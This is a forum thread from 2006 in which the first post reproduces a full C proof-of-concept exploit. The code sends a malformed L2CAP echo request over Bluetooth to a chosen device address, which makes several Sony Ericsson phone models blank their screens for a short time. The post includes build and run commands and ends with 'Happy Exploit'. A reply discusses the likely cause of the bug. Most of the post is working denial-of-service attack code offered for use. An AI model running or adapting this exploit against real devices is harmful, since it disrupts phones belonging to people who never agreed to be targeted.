|
Welcome to the GSM-Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. Only registered members may post questions, contact other members or search our database of over 8 million posts. Registration is fast, simple and absolutely free so please - Click to REGISTER! If you have any problems with the registration process or your account login, please contact contact us . |
|
Register | FAQ | Donate | Forum Rules | Root any Device | ★iPhone Unlock★ | ★ Direct Codes ★ | Direct Unlock Source |
GSM Programming & Reverse Engineering Here you can post all Kind of GSM Programming and Reverse Engineering tools and Secrets. |
| LinkBack | Thread Tools | Display Modes |
02-10-2006, 13:04 | #1 (permalink) |
No Life Poster Join Date: Dec 2004 Location: 0x001FD00
Posts: 1,285
Member: 98572 Status: Offline Thanks Meter: 36 | SEMC BlueTooth Exploit, K600i, V600i, K750i, W800i and maybe other ones /* Pierre BETOUIN - [email protected] */ /* 05-02-2006 */ /* Vulnerability found using BSS fuzzer : */ /* Download www.secuobs.com/news/05022006-bluetooth10.shml */ /* */ /* Causes anormal behaviours on some Sony/Ericsson */ /* cell phones */ /* Vulnerable tested devices : */ /* - K600i */ /* - V600i */ /* - K750i */ /* - W800i */ /* - And maybe other ones... */ /* */ /* Vulnerable devices will slowly turn their screen into */ /* black and then display a white screen. */ /* After a short period (~45sec), they will go back to */ /* their normal behaviour */ /* */ /* gcc -lbluetooth reset_display_sonyericsson.c */ /* -o reset_display_sonyericsson */ /* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/l2cap.h> #define SIZE 4 #define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) int main(int argc, char **argv) { char *buffer; l2cap_cmd_hdr *cmd; struct sockaddr_l2 addr; int sock, sent, i; if(argc < 2) { fprintf(stderr, "%s <btaddr>\n", argv[0]); exit(EXIT_FAILURE); } if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) { perror("socket"); exit(EXIT_FAILURE); } memset(&addr, 0, sizeof(addr)); addr.l2_family = AF_BLUETOOTH; if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("bind"); exit(EXIT_FAILURE); } str2ba(argv[1], &addr.l2_bdaddr); if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("connect"); exit(EXIT_FAILURE); } if(!(buffer = (char *) malloc ((int) SIZE + 1))) { perror("malloc"); exit(EXIT_FAILURE); } memset(buffer, 90, SIZE); cmd = (l2cap_cmd_hdr *) buffer; cmd->code = L2CAP_ECHO_REQ; cmd->ident = 1; cmd->len = FAKE_SIZE; if( (sent=send(sock, buffer, SIZE, 0)) >= 0) { printf("L2CAP packet sent (%d)\n", sent); } printf("Buffer:\t"); for(i=0; i<sent; i++) printf("%.2X ", (unsigned char) buffer[i]); printf("\n"); free(buffer); close(sock); return EXIT_SUCCESS; } /* Happy Exploit... |
02-10-2006, 15:10 | #2 (permalink) |
No Life Poster Join Date: Nov 2001 Location: England Age: 41
Posts: 2,821
Member: 7653 Status: Offline Thanks Meter: 823 | so it looks like sending any command to these phone with incorrect packet size will cause this malfunction? from using a sony ericsson k750 then w800 then w550 and seeing how "unpolished" the software is, i am not surprised by this. and i think there will be other, more malicious bugs in the softwares... |
Bookmarks |
| |
Similar Threads | ||||
Thread | Thread Starter | Forum | Replies | Last Post |
WTB polar box and maybe others | almobilelink | Sell ur Old and Used Stuff | 1 | 07-28-2009 14:28 |
Lang pack on new Moto phones like Z8 and maybe others. | Raklm | Smart-Clip | 3 | 09-01-2008 07:21 |
JAVA PROGRAMS for K750i / W800i / D750i / K700i / W550i / W600i / K600i | vishnugsm | Sony Ericsson Media, RingTones, Games | 2 | 01-21-2007 19:13 |
k750i/w800i no bluetooth | Jamieev | Sony Ericsson | 2 | 12-14-2006 03:25 |
after flashing K750i@w800i bluetooth | jun36 | Sony Ericsson Hardware Repair | 1 | 09-07-2005 18:56 |
|